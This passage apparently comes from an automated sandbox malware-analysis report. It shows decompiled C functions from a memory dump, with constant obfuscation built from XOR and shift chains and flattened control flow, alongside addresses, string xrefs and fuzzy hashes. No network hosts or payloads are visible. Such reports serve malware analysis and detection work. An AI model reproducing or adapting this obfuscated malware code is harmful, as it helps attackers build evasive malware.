				_v2628 = 0x3b0ebd;
				_v2628 = _v2628 + 0x5a12;
				_v2628 = _v2628 ^ 0x003a37d5;
				_v2728 = 0xd9912;
				_v2728 = _v2728 + 0xffffff8e;
				_v2728 = _v2728 + 0x151b;
				_v2728 = _v2728 ^ 0xc919a244;
				_v2728 = _v2728 ^ 0xc91387be;
				_v2652 = 0x9a1e89;
				_v2652 = _v2652 + 0xffffd410;
				_v2652 = _v2652 + 0xffff287e;
				_v2652 = _v2652 ^ 0x009c4256;
				_v2684 = 0x15a0e6;
				_v2684 = _v2684 ^ 0xb8dbbab6;
				_v2684 = _v2684 + 0x97da;
				_v2684 = _v2684 ^ 0xb8cbbf76;
				_v2668 = 0x9ef103;
				_v2668 = _v2668 + 0xffff7b94;
				_v2668 = _v2668 | 0x00319522;
				_v2668 = _v2668 ^ 0x00bf326f;
				_v2620 = 0x4a1e54;
				_v2620 = _v2620 >> 6;
				_v2620 = _v2620 ^ 0x000c4793;
				_v2736 = 0xd06d17;
				_v2736 = _v2736 + 0x884d;
				_v2736 = _v2736 ^ 0x7404790a;
				_v2736 = _v2736 | 0xba93ab77;
				_v2736 = _v2736 ^ 0xfed43485;
				_v2612 = 0x954bd3;
				_v2612 = _v2612 ^ 0x8ffa8774;
				_v2612 = _v2612 ^ 0x8f608466;
				_v2720 = 0xd6acec;
				_v2720 = _v2720 + 0xffff5ed2;
				_v2720 = _v2720 >> 0xf;
				_v2720 = _v2720 ^ 0x0006c51a;
				_v2748 = 0xa0b218;
				_v2748 = _v2748 | 0x2e802189;
				_v2748 = _v2748 * 0x73;
				_v2748 = _v2748 + 0xffff7bdc;
				_v2748 = _v2748 ^ 0xf2382bfd;
				_v2764 = 0x9e4a45;
				_v2764 = _v2764 << 8;
				_v2764 = _v2764 ^ 0x3e46804a;
				_v2764 = _v2764 * 0x37;
				_v2764 = _v2764 ^ 0x62bdc582;
				_v2604 = 0x8883eb;
				_v2604 = _v2604 * 0x4c;
				_v2604 = _v2604 ^ 0x28896087;
				_v2772 = 0xfc6e81;
				_v2772 = _v2772 << 8;
				_v2772 = _v2772 + 0xffff5041;
				_v2772 = _v2772 >> 9;
				_v2772 = _v2772 ^ 0x007ce74b;
				_v2704 = 0x7b4330;
				_v2704 = _v2704 | 0xa64a6f4f;
				_v2704 = _v2704 + 0xffff51e2;
				_v2704 = _v2704 ^ 0xa6766629;
				_v2696 = 0x68ffb;
				_v2696 = _v2696 + 0xffffae8e;
				_t454 = 0x4c;
				_v2696 = _v2696 * 0x15;
				_v2696 = _v2696 ^ 0x008a270b;
				_v2608 = 0x25e908;
				_v2608 = _v2608 | 0x89f6fe45;
				_v2608 = _v2608 ^ 0x89f18a7c;
				_v2680 = 0x64c7ce;
				_v2680 = _v2680 + 0xffff812d;
				_v2680 = _v2680 / _t446;
				_v2680 = _v2680 ^ 0x000edd4f;
				_v2732 = 0xd7b79d;
				_v2732 = _v2732 << 0x10;
				_v2732 = _v2732 + 0xffff219d;
				_v2732 = _v2732 / _t454;
				_v2732 = _v2732 ^ 0x026afb0e;
				_v2740 = 0xa96152;
				_v2740 = _v2740 >> 5;
				_t455 = 0x54;
				_v2740 = _v2740 / _t455;
				_v2740 = _v2740 | 0x77a7e005;
				_v2740 = _v2740 ^ 0x77acf7d0;
				_v2688 = 0xb17947;
				_v2688 = _v2688 ^ 0x532d5061;
				_v2688 = _v2688 + 0x450a;
				_v2688 = _v2688 ^ 0x5396c605;
				_v2640 = 0x5ab761;
				_v2640 = _v2640 << 2;
				_v2640 = _v2640 ^ 0x01641603;
				_v2664 = 0x3ff5f1;
				_v2664 = _v2664 | 0x0a43160e;
				_t456 = 0x11;
				_v2664 = _v2664 / _t456;
				_v2664 = _v2664 ^ 0x009776ed;
				_v2672 = 0x3c4cc1;
				_v2672 = _v2672 >> 3;
				_v2672 = _v2672 >> 0x10;
				_v2672 = _v2672 ^ 0x0009519e;
				_v2712 = 0x1eac75;
				_v2712 = _v2712 << 9;
				_v2712 = _v2712 + 0xffff6483;
				_v2712 = _v2712 ^ 0x3d5a7f2c;
				_v2724 = 0xe4c37e;
				_v2724 = _v2724 >> 0xd;
				_v2724 = _v2724 + 0x40c2;
				_v2724 = _v2724 >> 0xb;
				_v2724 = _v2724 ^ 0x00093098;
				_v2716 = 0x23ebfd;
				_v2716 = _v2716 ^ 0xd48ea434;
				_v2716 = _v2716 + 0xfffffa83;
				_v2716 = _v2716 ^ 0xd4aba8c7;
				_v2624 = 0x214d16;
				_v2624 = _v2624 ^ 0x608c534a;
				_v2624 = _v2624 ^ 0x60add2f4;
				_v2632 = 0x7bbdf2;
				_v2632 = _v2632 ^ 0x64f180bf;
				_v2632 = _v2632 ^ 0x6483f2c7;
				do {
					while(_t497 != 0x7d63619) {
						if(_t497 == 0xd6a7cf6) {
							E00BB24AA(_t456, _v2708, __eflags,  &_v2600, _v2768, _v2656, _v2676);
							 *((short*)(E00BC0F17(_v2644, _v2744,  &_v2600, _v2700, _v2648))) = 0;
							E00BCCC3F(_v2660,  &_v1560, __eflags, _v2760);
							_push(0xbb11b0);
							E00BD06A6(__eflags,  &_v2600, _v2692, E00BD0AD3(_v2616, _v2636, __eflags), _v2752, _v2628,  &_v2080, _v2728);
							E00BC2EED(_v2652, _v2684, _v2668, _t441);
							_t456 =  &_v2080;
							_t435 = E00BD3306(_t456, _v2620, _v2736, _v2612, _t496, _v2720);
							_t501 =  &(_t501[0x16]);
							__eflags = _t435;
							if(__eflags != 0) {
								_t497 = 0x7d63619;
								continue;
							}
						} else {
							if(_t497 != 0xe9a37bd) {
								goto L8;
							} else {
								_t497 = 0xd6a7cf6;
								continue;
							}
						}
						goto L9;
					}
					_push(_t456);
					E00BBE259(_v2748, _v2756, _v2764, _v2604, _t456, _t456,  &_v1040, _v2772, _v2704);
					_push(0xbb1200);
					E00BD06A6(__eflags,  &_v1040, _v2680, E00BD0AD3(_v2696, _v2608, __eflags), _v2732, _v2740,  &_v520, _v2688);
					_t456 = _v2640;
					E00BC2EED(_t456, _v2664, _v2672, _t429);
					_push(_v2632);
					_push( &_v520);
					_push(0);
					_push(_v2624);
					_push(_v2716);
					_push(_v2724);
					_push(0);
					_push(0);
					_t435 = E00BD06EF(_v2712, __eflags);
					_t501 =  &(_t501[0x1a]);
					_t497 = 0x5b6dba;
					L8:
					__eflags = _t497 - 0x5b6dba;
				} while (__eflags != 0);
				L9:
				return _t435;
			}

0x00bb4716
0x00bb471c
0x00bb4730
0x00bb4732
0x00bb4737
0x00bb473c
0x00bb4742
0x00bb474a
0x00bb474f
0x00bb4757
0x00bb475f
0x00bb476c
0x00bb476f
0x00bb4773
0x00bb477b
0x00bb4783
0x00bb478b
0x00bb4793
0x00bb479b
0x00bb47a3
0x00bb47b9
0x00bb47c0
0x00bb47c8
0x00bb47d3
0x00bb47db
0x00bb47e0
0x00bb47e8
0x00bb47f0
0x00bb47fb
0x00bb4806
0x00bb4811
0x00bb481d
0x00bb4822
0x00bb4828
0x00bb4830
0x00bb4835
0x00bb483d
0x00bb4845
0x00bb484a
0x00bb4852
0x00bb485a
0x00bb486c
0x00bb4871
0x00bb487a
0x00bb4882
0x00bb488d
0x00bb4898
0x00bb48aa
0x00bb48ad
0x00bb48b4
0x00bb48bf
0x00bb48c7
0x00bb48cf
0x00bb48dc
0x00bb48e0
0x00bb48e8
0x00bb48f3
0x00bb4900
0x00bb490b
0x00bb4916
0x00bb4921
0x00bb492c
0x00bb4934
0x00bb493c
0x00bb4944
0x00bb494c
0x00bb495a
0x00bb495d
0x00bb4961
0x00bb4966
0x00bb496b
0x00bb4973
0x00bb497e
0x00bb4989
0x00bb4994
0x00bb499c
0x00bb49a1
0x00bb49a9
0x00bb49b1
0x00bb49b9
0x00bb49c4
0x00bb49cf
0x00bb49da
0x00bb49e5
0x00bb49ed
0x00bb49f5
0x00bb49fd
0x00bb4a05
0x00bb4a0d
0x00bb4a15
0x00bb4a1d
0x00bb4a25
0x00bb4a30
0x00bb4a38
0x00bb4a43
0x00bb4a4b
0x00bb4a53
0x00bb4a5b
0x00bb4a63
0x00bb4a6b
0x00bb4a76
0x00bb4a81
0x00bb4a8c
0x00bb4a94
0x00bb4a9c
0x00bb4aa1
0x00bb4aa9
0x00bb4ab1
0x00bb4abe
0x00bb4ac2
0x00bb4aca
0x00bb4ad2
0x00bb4ada
0x00bb4adf
0x00bb4aec
0x00bb4af0
0x00bb4af8
0x00bb4b0b
0x00bb4b12
0x00bb4b1d
0x00bb4b25
0x00bb4b2a
0x00bb4b32
0x00bb4b37
0x00bb4b3f
0x00bb4b47
0x00bb4b4f
0x00bb4b57
0x00bb4b5f
0x00bb4b67
0x00bb4b78
0x00bb4b80
0x00bb4b84
0x00bb4b8c
0x00bb4b97
0x00bb4ba2
0x00bb4bad
0x00bb4bb5
0x00bb4bc5
0x00bb4bc9
0x00bb4bd1
0x00bb4bd9
0x00bb4bde
0x00bb4bee
0x00bb4bf2
0x00bb4bfa
0x00bb4c02
0x00bb4c0b
0x00bb4c10
0x00bb4c16
0x00bb4c1e
0x00bb4c26
0x00bb4c2e
0x00bb4c36
0x00bb4c3e
0x00bb4c46
0x00bb4c51
0x00bb4c59
0x00bb4c64
0x00bb4c6f
0x00bb4c81
0x00bb4c84
0x00bb4c88
0x00bb4c90
0x00bb4c98
0x00bb4c9d
0x00bb4ca2
0x00bb4caa
0x00bb4cb2
0x00bb4cb7
0x00bb4cbf
0x00bb4cc7
0x00bb4ccf
0x00bb4cd4
0x00bb4cdc
0x00bb4ce1
0x00bb4ce9
0x00bb4cf1
0x00bb4cf9
0x00bb4d01
0x00bb4d09
0x00bb4d14
0x00bb4d1f
0x00bb4d2a
0x00bb4d35
0x00bb4d40
0x00bb4d4d
0x00bb4d4d
0x00bb4d5b
0x00bb4d8b
0x00bb4dc0
0x00bb4dca
0x00bb4ddd
0x00bb4e17
0x00bb4e2f
0x00bb4e38
0x00bb4e52
0x00bb4e57
0x00bb4e5a
0x00bb4e5c
0x00bb4e62
0x00000000
0x00bb4e62
0x00bb4d5d
0x00bb4d63
0x00000000
0x00bb4d69
0x00bb4d69
0x00000000
0x00bb4d69
0x00bb4d63
0x00000000
0x00bb4d5b
0x00bb4e69
0x00bb4e8f
0x00bb4e9f
0x00bb4ed9
0x00bb4eed
0x00bb4ef4
0x00bb4ef9
0x00bb4f07
0x00bb4f08
0x00bb4f09
0x00bb4f10
0x00bb4f14
0x00bb4f1c
0x00bb4f1d
0x00bb4f1e
0x00bb4f23
0x00bb4f26
0x00bb4f2b
0x00bb4f2b
0x00bb4f2b
0x00bb4f41
0x00bb4f41

Strings

:=Z, xrefs: 00BB483D
E, xrefs: 00BB4C36
0C{, xrefs: 00BB4B3F
K|, xrefs: 00BB4B37
34, xrefs: 00BB4916
aP-S, xrefs: 00BB4C2E
K|, xrefs: 00BB4726
g, xrefs: 00BB4898

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: E$0C{$34$:=Z$K|$K|$aP-S$g
API String ID: 0-2882036941
Opcode ID: b469b3c52efd01ef371c7f409e096dbc9e4cb10d710ade012f790f2ff7cac248
Instruction ID: 9666be77a663ddd75d9190c8ece71c4298d5dcf3d03220834d8b62adc1142511
Opcode Fuzzy Hash: b469b3c52efd01ef371c7f409e096dbc9e4cb10d710ade012f790f2ff7cac248
Instruction Fuzzy Hash: 5212017250D3819FD3A8CF65C58AA8BBBE2FBD1748F10891DE1D986260D7B18949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00BC89DA, Relevance: 10.3, Strings: 8, Instructions: 318
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00BC89DA() {
				char _v524;
				signed int _v528;
				signed int _v532;
				intOrPtr _v536;
				signed int _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				char _v580;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _v704;
				signed int _v708;
				signed int _t347;
				intOrPtr _t354;
				void* _t358;
				char _t371;
				void* _t403;
				signed int _t404;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				signed int _t409;
				signed int _t410;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t414;
				signed int* _t417;

				_t417 =  &_v708;
				_v532 = _v532 & 0x00000000;
				_v528 = _v528 & 0x00000000;
				_t358 = 0x8c0cbd5;
				_v536 = 0x6dc292;
				_v644 = 0x989675;
				_v644 = _v644 + 0xffff9fdc;
				_t404 = 0xe;
				_v644 = _v644 / _t404;
				_v644 = _v644 ^ 0x000adf4f;
				_t403 = 0;
				_v596 = 0x3e9c14;
				_v596 = _v596 | 0x1a24748f;
				_v596 = _v596 ^ 0x1a3efd9f;
				_v708 = 0x129b00;
				_v708 = _v708 + 0xffffabef;
				_v708 = _v708 + 0xffff405c;
				_v708 = _v708 | 0xad8b68fe;
				_v708 = _v708 ^ 0xad9beffc;
				_v640 = 0x17585e;
				_v640 = _v640 >> 4;
				_v640 = _v640 ^ 0x7aac2059;
				_v640 = _v640 ^ 0x7aad55dc;
				_v684 = 0xebdf26;
				_v684 = _v684 + 0x4aa7;
				_v684 = _v684 ^ 0xe6eebd87;
				_v684 = _v684 << 8;
				_v684 = _v684 ^ 0x029be0aa;
				_v692 = 0x969cdf;
				_v692 = _v692 | 0x9df6d34e;
				_v692 = _v692 + 0xffff5933;
				_t405 = 0x76;
				_v692 = _v692 / _t405;
				_v692 = _v692 ^ 0x0156bb46;
				_v600 = 0xf4250f;
				_v600 = _v600 | 0x09a4de6f;
				_v600 = _v600 ^ 0x09f6db4e;
				_v700 = 0xaf5ab6;
				_v700 = _v700 ^ 0xcaf78780;
				_v700 = _v700 ^ 0x48592258;
				_v700 = _v700 | 0x3566b98a;
				_v700 = _v700 ^ 0xb7685338;
				_v632 = 0x4b1a10;
				_t406 = 0x1e;
				_v632 = _v632 * 0x38;
				_v632 = _v632 >> 5;
				_v632 = _v632 ^ 0x008fd8b3;
				_v652 = 0xecd774;
				_v652 = _v652 + 0x2f77;
				_v652 = _v652 << 8;
				_v652 = _v652 ^ 0xed09f1a5;
				_v608 = 0x85220c;
				_v608 = _v608 >> 0xd;
				_v608 = _v608 ^ 0x0000e0b9;
				_v696 = 0x550397;
				_v696 = _v696 >> 2;
				_v696 = _v696 ^ 0xe6635f4b;
				_v696 = _v696 << 0xa;
				_v696 = _v696 ^ 0xd8732559;
				_v664 = 0xe759ad;
				_v664 = _v664 >> 9;
				_v664 = _v664 / _t406;
				_v664 = _v664 ^ 0x000ce79a;
				_v612 = 0x53b0cb;
				_v612 = _v612 << 0xb;
				_v612 = _v612 ^ 0x9d8cfa49;
				_v656 = 0x60e4b6;
				_t407 = 0x7c;
				_v656 = _v656 * 0x5d;
				_v656 = _v656 >> 1;
				_v656 = _v656 ^ 0x11926f24;
				_v604 = 0x85927;
				_v604 = _v604 / _t407;
				_v604 = _v604 ^ 0x0004dfd6;
				_v624 = 0xddfaa4;
				_v624 = _v624 << 1;
				_t408 = 0x4f;
				_v624 = _v624 / _t408;
				_v624 = _v624 ^ 0x000d1445;
				_v660 = 0x48b692;
				_t409 = 0x25;
				_v660 = _v660 * 0x31;
				_v660 = _v660 / _t409;
				_v660 = _v660 ^ 0x00693142;
				_v592 = 0x3c2c;
				_v592 = _v592 | 0x13734d92;
				_v592 = _v592 ^ 0x1374e23a;
				_v628 = 0x616169;
				_v628 = _v628 | 0x0ca07919;
				_t410 = 0x62;
				_v628 = _v628 / _t410;
				_v628 = _v628 ^ 0x002e308f;
				_v636 = 0xb3b307;
				_v636 = _v636 << 0xe;
				_t411 = 0xc;
				_v636 = _v636 / _t411;
				_v636 = _v636 ^ 0x13be71c1;
				_v688 = 0x765eaf;
				_v688 = _v688 << 5;
				_v688 = _v688 + 0xd5af;
				_v688 = _v688 ^ 0x6f133939;
				_v688 = _v688 ^ 0x61db9f27;
				_v680 = 0xe676f4;
				_v680 = _v680 | 0x0f0600fc;
				_v680 = _v680 + 0x32e8;
				_v680 = _v680 >> 0x10;
				_v680 = _v680 ^ 0x000ff84c;
				_v672 = 0x6b8bdf;
				_v672 = _v672 << 0xf;
				_t412 = 0x4b;
				_v672 = _v672 / _t412;
				_v672 = _v672 >> 0xb;
				_v672 = _v672 ^ 0x0003474a;
				_v648 = 0x583b67;
				_v648 = _v648 ^ 0x91ae491e;
				_v648 = _v648 ^ 0xe58f0aab;
				_v648 = _v648 ^ 0x747c61df;
				_v620 = 0x170d4a;
				_v620 = _v620 + 0x280d;
				_v620 = _v620 + 0x2b70;
				_v620 = _v620 ^ 0x0011831a;
				_v704 = 0x16af50;
				_v704 = _v704 + 0xffffd4d6;
				_v704 = _v704 + 0xffff1ecb;
				_v704 = _v704 ^ 0xb6b85bb8;
				_v704 = _v704 ^ 0xb6a532c7;
				_v668 = 0x75bc8b;
				_v668 = _v668 << 0xc;
				_v668 = _v668 + 0xdfef;
				_t413 = 0x64;
				_v668 = _v668 / _t413;
				_v668 = _v668 ^ 0x00e93791;
				_v616 = 0x841ad8;
				_t414 = 0x36;
				_v616 = _v616 / _t414;
				_v616 = _v616 ^ 0x000da753;
				_t357 = _v616;
				_v676 = 0x15bb94;
				_v676 = _v676 ^ 0x1510b175;
				_v676 = _v676 + 0xffff851d;
				_v676 = _v676 >> 0xc;
				_v676 = _v676 ^ 0x00038b10;
				do {
					while(_t358 != 0x72ae81) {
						if(_t358 == 0xb71d2e) {
							E00BC9038(_v668, _v616, _t357, _v676);
						} else {
							if(_t358 == 0x3e220a4) {
								_t347 = E00BC2D06(_v596, _v660, _v592,  &_v524, _t358, _v708, _v628, _v636, _v688, _t358, _v680, 0, _v644);
								_t357 = _t347;
								_t417 =  &(_t417[0xb]);
								__eflags = _t347 - 0xffffffff;
								if(__eflags != 0) {
									_t358 = 0xf5e2107;
									continue;
								}
							} else {
								if(_t358 == 0x8c0cbd5) {
									_t358 = 0x72ae81;
									continue;
								} else {
									if(_t358 == 0x95a34a5) {
										_push(0xbb141c);
										E00BD06A6(__eflags,  *0xbd5bd8 + 0x238, _v608, E00BD0AD3(_v632, _v652, __eflags), _v696, _v664,  &_v524, _v612);
										_t417 =  &(_t417[7]);
										E00BC2EED(_v656, _v604, _v624, _t348);
										_t358 = 0x3e220a4;
										continue;
									} else {
										if(_t358 == 0xf47d0b8) {
											_v588 = _v588 - E00BB2CB5(_t358);
											_t358 = 0x95a34a5;
											asm("sbb [esp+0x8c], edx");
											continue;
										} else {
											if(_t358 != 0xf5e2107) {
												goto L15;
											} else {
												_t354 = _v584;
												_t371 = _v588;
												_v576 = _t354;
												_v568 = _t354;
												_v560 = _t354;
												_v552 = _t354;
												_v580 = _t371;
												_v572 = _t371;
												_v564 = _t371;
												_v556 = _t371;
												_v548 = _v640;
												E00BB890E(_t357,  &_v580, _v672, _v648, _t371, _t371, _v620, _v704);
												_t417 =  &(_t417[6]);
												_t403 =  !=  ? 1 : _t403;
												_t358 = 0xb71d2e;
												continue;
											}
										}
									}
								}
							}
						}
						L18:
						return _t403;
					}
					E00BB921F(_v684, _v692,  &_v588, _v600, _v700);
					_t417 =  &(_t417[3]);
					_t358 = 0xf47d0b8;
					L15:
					__eflags = _t358 - 0x6e156f7;
				} while (__eflags != 0);
				goto L18;
			}

0x00bc89da
0x00bc89e0
0x00bc89ea
0x00bc89f2
0x00bc89f7
0x00bc8a02
0x00bc8a0a
0x00bc8a1c
0x00bc8a21
0x00bc8a27
0x00bc8a2f
0x00bc8a31
0x00bc8a3c
0x00bc8a47
0x00bc8a52
0x00bc8a5a
0x00bc8a62
0x00bc8a6a
0x00bc8a72
0x00bc8a7a
0x00bc8a82
0x00bc8a87
0x00bc8a8f
0x00bc8a97
0x00bc8a9f
0x00bc8aa7
0x00bc8aaf
0x00bc8ab4
0x00bc8abc
0x00bc8ac4
0x00bc8acc
0x00bc8ad8
0x00bc8add
0x00bc8ae3
0x00bc8aeb
0x00bc8af6
0x00bc8b01
0x00bc8b0c
0x00bc8b14
0x00bc8b1c
0x00bc8b24
0x00bc8b2c
0x00bc8b34
0x00bc8b41
0x00bc8b42
0x00bc8b46
0x00bc8b4b
0x00bc8b53
0x00bc8b5b
0x00bc8b63
0x00bc8b68
0x00bc8b70
0x00bc8b78
0x00bc8b7d
0x00bc8b85
0x00bc8b8d
0x00bc8b92
0x00bc8b9a
0x00bc8b9f
0x00bc8ba7
0x00bc8baf
0x00bc8bba
0x00bc8bbe
0x00bc8bc6
0x00bc8bce
0x00bc8bd3
0x00bc8bdd
0x00bc8bec
0x00bc8bef
0x00bc8bf3
0x00bc8bf7
0x00bc8bff
0x00bc8c0f
0x00bc8c13
0x00bc8c1b
0x00bc8c23
0x00bc8c2b
0x00bc8c30
0x00bc8c36
0x00bc8c3e
0x00bc8c4b
0x00bc8c4e
0x00bc8c5a
0x00bc8c5e
0x00bc8c66
0x00bc8c71
0x00bc8c7c
0x00bc8c87
0x00bc8c8f
0x00bc8c9b
0x00bc8ca0
0x00bc8ca6
0x00bc8cae
0x00bc8cb6
0x00bc8cbf
0x00bc8cc4
0x00bc8cca
0x00bc8cd2
0x00bc8cda
0x00bc8cdf
0x00bc8ce7
0x00bc8cef
0x00bc8cf7
0x00bc8cff
0x00bc8d07
0x00bc8d0f
0x00bc8d14
0x00bc8d1c
0x00bc8d24
0x00bc8d2d
0x00bc8d30
0x00bc8d34
0x00bc8d39
0x00bc8d41
0x00bc8d49
0x00bc8d51
0x00bc8d59
0x00bc8d61
0x00bc8d69
0x00bc8d71
0x00bc8d79
0x00bc8d83
0x00bc8d90
0x00bc8d98
0x00bc8da0
0x00bc8da8
0x00bc8db0
0x00bc8db8
0x00bc8dbd
0x00bc8dcb
0x00bc8dd0
0x00bc8dd6
0x00bc8dde
0x00bc8dea
0x00bc8ded
0x00bc8df1
0x00bc8df9
0x00bc8dfd
0x00bc8e05
0x00bc8e0d
0x00bc8e15
0x00bc8e1a
0x00bc8e22
0x00bc8e22
0x00bc8e30
0x00bc9018
0x00bc8e36
0x00bc8e3c
0x00bc8fbc
0x00bc8fc1
0x00bc8fc3
0x00bc8fc6
0x00bc8fc9
0x00bc8fcb
0x00000000
0x00bc8fcb
0x00bc8e42
0x00bc8e48
0x00bc8f7f
0x00000000
0x00bc8e4e
0x00bc8e54
0x00bc8f1d
0x00bc8f56
0x00bc8f5b
0x00bc8f6e
0x00bc8f75
0x00000000
0x00bc8e5a
0x00bc8e60
0x00bc8efd
0x00bc8f04
0x00bc8f09
0x00000000
0x00bc8e66
0x00bc8e6c
0x00000000
0x00bc8e72
0x00bc8e72
0x00bc8e80
0x00bc8e87
0x00bc8e8e
0x00bc8e95
0x00bc8e9c
0x00bc8eab
0x00bc8eb6
0x00bc8ec3
0x00bc8ece
0x00bc8ed7
0x00bc8ede
0x00bc8ee5
0x00bc8eeb
0x00bc8eee
0x00000000
0x00bc8eee
0x00bc8e6c
0x00bc8e60
0x00bc8e54
0x00bc8e48
0x00bc8e3c
0x00bc901f
0x00bc902b
0x00bc902b
0x00bc8ff0
0x00bc8ff5
0x00bc8ff8
0x00bc8ffd
0x00bc8ffd
0x00bc8ffd
0x00000000

Strings

iaa, xrefs: 00BC8C87
p+, xrefs: 00BC8D71
g;X, xrefs: 00BC8D41
K_c, xrefs: 00BC8B92
w/, xrefs: 00BC8B5B
2, xrefs: 00BC8D07
,<, xrefs: 00BC8C66
B1i, xrefs: 00BC8C5E

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: ,<$B1i$K_c$g;X$iaa$p+$w/$2
API String ID: 0-2198714066
Opcode ID: 569e70fba17bd0486be1ecae218dcb915413425102cba9e8614b70d89ed3fee1
Instruction ID: 9ba4e6ba1bd00ae299f262f402b93ee5ae30446ff16fac51286eac138c830edb
Opcode Fuzzy Hash: 569e70fba17bd0486be1ecae218dcb915413425102cba9e8614b70d89ed3fee1
Instruction Fuzzy Hash: 17F131715083409FD368CF26C98AA5BBBF1FBC4758F50891DF2AA86260D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00BBB7EC, Relevance: 10.3, Strings: 8, Instructions: 309
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E00BBB7EC(signed int __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				char _v524;
				char _v1044;
				short _v1588;
				short _v1590;
				intOrPtr _v1592;
				signed int _v1636;
				intOrPtr _v1668;
				char _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				signed int _v1796;
				signed int _v1800;
				signed int _v1804;
				signed int _v1808;
				signed int _v1812;
				signed int _v1816;
				void* __ecx;
				void* _t280;
				signed int _t301;
				signed int _t302;
				signed int _t305;
				intOrPtr _t314;
				void* _t316;
				signed int _t322;
				void* _t345;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t362;
				void* _t363;
				void* _t364;

				_t314 = _a12;
				_push(_a24);
				_t362 = __edx;
				_push(_a20);
				_push(_a16);
				_push(_t314);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E00BB8002(_t280);
				_v1792 = 0x40fe64;
				_t364 = _t363 + 0x20;
				_v1792 = _v1792 | 0x075bde2c;
				_t316 = 0xf2ce37d;
				_t356 = 0x3b;
				_v1792 = _v1792 / _t356;
				_v1792 = _v1792 + 0xffff4104;
				_v1792 = _v1792 ^ 0x001f2fb2;
				_v1768 = 0x4a7072;
				_v1768 = _v1768 + 0x390e;
				_v1768 = _v1768 << 0xb;
				_v1768 = _v1768 ^ 0x55471dfb;
				_v1800 = 0x3a62e5;
				_v1800 = _v1800 >> 8;
				_v1800 = _v1800 + 0x6e02;
				_t357 = 0x43;
				_v1800 = _v1800 / _t357;
				_v1800 = _v1800 ^ 0x00003860;
				_v1808 = 0x8fdf58;
				_v1808 = _v1808 + 0xd47f;
				_t358 = 0x45;
				_v1808 = _v1808 * 0x3b;
				_v1808 = _v1808 * 0x5d;
				_v1808 = _v1808 ^ 0x1d7c95f5;
				_v1776 = 0xcb904c;
				_v1776 = _v1776 << 8;
				_v1776 = _v1776 << 0x10;
				_v1776 = _v1776 ^ 0x4c065fd0;
				_v1728 = 0xf001c2;
				_v1728 = _v1728 / _t358;
				_v1728 = _v1728 ^ 0x0004ac95;
				_v1772 = 0xb9fbd3;
				_v1772 = _v1772 * 0x34;
				_v1772 = _v1772 + 0xffff8c95;
				_v1772 = _v1772 ^ 0x25c60df9;
				_v1720 = 0x6b7ae2;
				_v1720 = _v1720 >> 0xd;
				_v1720 = _v1720 ^ 0x000315fd;
				_v1740 = 0x21fc40;
				_v1740 = _v1740 + 0xe088;
				_v1740 = _v1740 * 0x44;
				_v1740 = _v1740 ^ 0x09468969;
				_v1716 = 0x53af26;
				_v1716 = _v1716 | 0x906737cc;
				_v1716 = _v1716 ^ 0x9073c5e9;
				_v1764 = 0x779cb1;
				_v1764 = _v1764 << 3;
				_v1764 = _v1764 | 0x6a7a53b3;
				_v1764 = _v1764 ^ 0x6bf6ddd4;
				_v1708 = 0xb309dc;
				_v1708 = _v1708 + 0x7e27;
				_v1708 = _v1708 ^ 0x00be0123;
				_v1748 = 0x25bc03;
				_v1748 = _v1748 | 0x7b4db4a0;
				_t359 = 0x33;
				_v1748 = _v1748 * 0x56;
				_v1748 = _v1748 ^ 0x76dcec1c;
				_v1816 = 0x4e19dd;
				_v1816 = _v1816 << 0xe;
				_v1816 = _v1816 >> 1;
				_v1816 = _v1816 + 0x3399;
				_v1816 = _v1816 ^ 0x433875d3;
				_v1780 = 0x46b4a5;
				_v1780 = _v1780 | 0xbffcbe77;
				_v1780 = _v1780 ^ 0xbff5c871;
				_v1812 = 0x8f8362;
				_v1812 = _v1812 + 0xffff553c;
				_v1812 = _v1812 | 0xd6febac0;
				_v1812 = _v1812 + 0x6db0;
				_v1812 = _v1812 ^ 0xd6fd5df5;
				_v1712 = 0xbb022b;
				_v1712 = _v1712 ^ 0xc593c721;
				_v1712 = _v1712 ^ 0xc52d10e6;
				_v1756 = 0xa61bb8;
				_v1756 = _v1756 + 0xffff6d2d;
				_v1756 = _v1756 + 0x25c8;
				_v1756 = _v1756 ^ 0x00aae0df;
				_v1804 = 0x7245f9;
				_v1804 = _v1804 >> 0xd;
				_v1804 = _v1804 << 0x10;
				_v1804 = _v1804 * 0x24;
				_v1804 = _v1804 ^ 0x808918f1;
				_v1704 = 0x188da2;
				_v1704 = _v1704 << 6;
				_v1704 = _v1704 ^ 0x0621291c;
				_v1700 = 0x2b28ac;
